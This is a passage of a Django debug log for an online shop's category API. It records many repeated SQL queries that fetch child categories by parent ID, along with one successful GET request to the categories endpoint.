"shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:41:31,352 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:41:31,354 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:41:31,356 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:41:31,359 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:41:31,361 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:41:31,364 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:41:31,366 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:41:31,368 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:41:31,371 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:41:31,373 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:41:31,376 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:41:31,378 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:41:31,380 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:41:31,384 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:41:31,386 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:41:31,388 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:41:31,390 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:41:31,392 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:41:31,394 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:41:31,398 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:41:31,400 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:41:31,402 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:41:31,404 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:41:31,406 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:41:31,410 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:41:31,412 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:41:31,414 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:41:31,416 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:41:31,418 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:41:31,422 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:41:31,424 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:41:31,426 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:41:31,428 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:41:31,431 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:41:31,433 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:41:31,436 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:41:31,438 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:41:31,440 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:41:31,443 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:41:31,445 utils 4252 140031732287232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:41:31] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:41:52,598 utils 4252 140031732287232 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:41:52,610 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:41:52,616 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:41:52,620 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:41:52,626 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:41:52,630 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:41:52,635 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:41:52,639 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:41:52,643 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:41:52,649 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:41:52,653 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:41:52,657 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:41:52,661 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:41:52,665 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:41:52,671 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:41:52,675 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:41:52,679 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:41:52,683 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:41:52,687 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:41:52,693 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:41:52,697 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:41:52,701 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:41:52,705 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:41:52,709 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:41:52,713 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:41:52,719 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:41:52,724 utils 4252 140031732287232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 